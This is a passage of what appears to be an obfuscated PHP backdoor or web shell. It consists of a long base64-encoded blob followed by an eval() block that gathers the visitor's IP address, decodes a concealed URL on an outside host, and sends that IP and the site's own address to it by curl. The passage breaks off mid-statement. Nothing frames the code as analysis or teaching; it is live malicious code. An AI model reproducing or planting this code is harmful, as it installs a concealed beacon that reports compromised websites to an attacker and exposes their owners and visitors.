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";
eval("?><?php\r\nfunction GetIP(){\r\n if(getenv(\"HTTP_CLIENT_IP\")) {\r\n \$ip = getenv(\"HTTP_CLIENT_IP\");\r\n } elseif(getenv(\"HTTP_X_FORWARDED_FOR\")) {\r\n \$ip = getenv(\"HTTP_X_FORWARDED_FOR\");\r\n if (strstr(\$ip, ',')) {\r\n \$tmp = explode (',', \$ip);\r\n \$ip = trim(\$tmp[0]);\r\n }\r\n } else {\r\n \$ip = getenv(\"REMOTE_ADDR\");\r\n }\r\n return \$ip;\r\n}\r\n\$x = base64_decode('aHR0cDovL2J5cjAwdC5jby9sLQ==').GetIP().'-'.base64_encode('http://'.\$_SERVER['HTTP_HOST'].\$_SERVER['REQUEST_URI']);\r\nif(function_exists('curl_init'))\r\n{\r\n \$ch = @curl_init(); curl_setopt(\$ch, CURLOPT_URL, \$x); curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true); \$gitt = curl_exec(\$ch); curl_close(\$ch);\r\n if(\$gitt == 